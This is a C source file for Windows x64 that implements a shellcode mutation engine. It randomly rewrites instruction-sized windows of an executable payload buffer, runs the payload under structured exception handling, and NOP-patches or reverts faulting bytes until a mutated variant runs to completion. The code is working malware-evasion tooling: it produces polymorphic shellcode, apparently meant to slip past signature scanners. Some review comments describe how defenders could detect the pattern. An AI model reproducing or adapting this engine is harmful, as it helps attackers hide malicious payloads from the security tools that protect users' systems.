#include <stdio.h>
#include <Windows.h>
#include "Unicorn2.h"
/* Copy of the x86MaxInsLen payload bytes that the current trial overwrote at
 * nextPayloadBuf + MuPos. Written by MuNxtPayload before it randomises the
 * window, read back by revert_code_handle (and by MuNxtPayload itself when a
 * random byte happens to be 0xC3) to undo the mutation. Holds only the most
 * recent window: each trial overwrites it. */
UINT8 BackupBuf[x86MaxInsLen] = { 0x0 };
/*
 * SEH filter invoked from the __except clause in MuNxtPayload
 * (via GetExceptionInformation()).
 *
 * ep: exception record and thread context of the fault raised while the
 *     mutated payload was running. Reads ContextRecord->Rip, so this
 *     compiles only for x64 targets.
 *
 * Side effects: writes into the payload buffer. When the faulting RIP lies
 * inside [nextPayloadBuf, nextPayloadBuf + NextPayloadSize) the single byte
 * at RIP is overwritten with 0x90 (NOP); otherwise the x86MaxInsLen bytes at
 * nextPayloadBuf + MuPos are restored from BackupBuf. Both writes require the
 * payload region to be writable as well as executable.
 *
 * Returns EXCEPTION_EXECUTE_HANDLER on every path: execution never resumes at
 * the patched instruction; control goes to the caller's __except block and
 * MuNxtPayload starts a fresh trial with a new MuPos.
 *
 * NOTE(review): patching code in a writable+executable region from inside an
 * exception filter is a high-signal pattern for memory scanners and EDR
 * telemetry (private RWX pages -- assuming that is how nextPayloadBuf is
 * allocated, not visible here -- plus faults with RIP in non-image memory).
 * It is a natural detection anchor for defenders.
 */
LONG revert_code_handle(EXCEPTION_POINTERS* ep)
{
    /* Address of the faulting instruction, treated as a byte pointer so it
       can be compared against, and written through like, the payload buffer. */
    UINT8 *RIP = (UINT8*)ep->ContextRecord->Rip;
    printf("Exception Caught! RIP = %p\n", (void*)RIP);
    /* Diagnostic only: the exception code does not change what happens below. */
    switch (ep->ExceptionRecord->ExceptionCode)
    {
    case EXCEPTION_ILLEGAL_INSTRUCTION:
        printf("- Illegal Instruction Exception Caught!\n");
        break;
    case EXCEPTION_PRIV_INSTRUCTION:
        printf("- Privileged Instruction Exception Caught!\n");
        break;
    case EXCEPTION_INT_DIVIDE_BY_ZERO:
        printf("- Divide By Zero Exception Caught!\n");
        break;
    case EXCEPTION_BREAKPOINT:
        printf("- Breakpoint Exception Caught!\n");
        break;
    case EXCEPTION_ACCESS_VIOLATION:
        printf("- Access Violation Exception Caught!\n");
        break;
    default:
        printf("- Other Exception Caught! Code: 0x%X\n", ep->ExceptionRecord->ExceptionCode);
    }
    /* Range check assumes nextPayloadBuf is a byte pointer/array and
       NextPayloadSize its length in bytes (both declared in Unicorn2.h). */
    if (RIP >= nextPayloadBuf && RIP < nextPayloadBuf + NextPayloadSize)
    {
        /* Fault inside the buffer: replace just the faulting byte with NOP.
           Note this byte is not restored by the revert path below; a later
           trial saves into BackupBuf whatever is at its own MuPos. */
        printf(" - Lucky, RIP still in range, patch: %x -> NOP\n", *RIP);
        *RIP = 0x90; // NOP
    }
    else
    {
        /* Fault outside the buffer: undo the whole mutated window. */
        printf(" - Oh no, RIP out of range, revert code\n");
        for(int i=0; i<x86MaxInsLen; i++)
        {
            nextPayloadBuf[MuPos + i] = BackupBuf[i];
        }
    }
    /* Unwind into the __except block rather than resuming at RIP. */
    return EXCEPTION_EXECUTE_HANDLER;
}
/*
 * Mutates one random instruction-sized window of nextPayloadBuf and runs the
 * payload to check that it still executes to completion.
 *
 * Up to 1024 trials; each trial:
 *   - stamps MuWatchDog with time(NULL) (only written here; presumably read
 *     by a watchdog declared in Unicorn2.h -- not visible in this file);
 *   - picks MuPos in [8, NextPayloadSize - x86MaxInsLen), keeping the first
 *     8 bytes intact. Assumes NextPayloadSize > 8 + x86MaxInsLen, otherwise
 *     the modulus is zero or negative -- TODO confirm the caller guarantees it;
 *   - saves the x86MaxInsLen bytes at MuPos into BackupBuf and overwrites each
 *     with a random byte, putting the original back wherever the random byte
 *     is 0xC3 (RET);
 *   - calls the payload at nextPayloadBuf + 8 inside __try. A normal return
 *     counts as success and the function returns; a fault goes through
 *     revert_code_handle (which patches or reverts the buffer) and the loop
 *     continues with a new MuPos.
 * After 1024 failed trials it prints a failure message and returns.
 *
 * Requires nextPayloadBuf to be writable and executable; uses MSVC SEH and
 * the x64 CONTEXT layout (via revert_code_handle).
 *
 * NOTE(review): executing a freshly written buffer under __try and looping
 * after ILLEGAL_INSTRUCTION / ACCESS_VIOLATION faults is itself a strong
 * behavioural indicator (RWX memory, repeated faults with RIP in non-image
 * memory) that EDR and memory scanners can alert on.
 */
void MuNxtPayload()
{
    for(int count=0; count<1024; count++)
    {
        printf("Finding Liveable Mutation Position...\n");
        /* Refresh the timestamp before each attempt; presumably a watchdog
           elsewhere compares it against the current time -- verify. */
        MuWatchDog = time(NULL);
        /* Random window start; the +8 skips the first 8 bytes, which are
           also the bytes skipped by the call below. */
        MuPos = Get_Hardware_Rand() % (NextPayloadSize - 8 - x86MaxInsLen) + 8; // Keep first 8 bytes
        for(int i=0; i<x86MaxInsLen; i++)
        {
            /* Keep the original so revert_code_handle can undo the window. */
            BackupBuf[i] = nextPayloadBuf[MuPos + i];
            /* Low byte of the hardware RNG value becomes the new payload byte. */
            nextPayloadBuf[MuPos + i] = Get_Hardware_Rand() & 0xFF;
            /* A random 0xC3 is put back: presumably because a stray RET would
               return early and be mistaken for a successful run -- verify. */
            if (nextPayloadBuf[MuPos + i] == 0xC3)
            {
                printf("revert RET instruction\n");
                nextPayloadBuf[MuPos + i] = BackupBuf[i];
            }
        }
        __try
        {
            /* Enter the payload at offset 8; what the first 8 bytes hold is
               not visible in this file. */
            ((void(*)())(nextPayloadBuf + 8))();
            /* %X assumes MuPos is an unsigned int-sized value -- see Unicorn2.h. */
            printf("Mutation Success @ 0x%X\n", MuPos);
            return;
        }
        /* The filter always yields EXCEPTION_EXECUTE_HANDLER, so every fault
           lands here and the loop retries with a new MuPos. */
        __except(revert_code_handle(GetExceptionInformation()))
        {
            printf("Shellcode Ran Into Exception, Handled\n");
        }
    }
    printf("Mutation Failed: max trial exceed\n");
}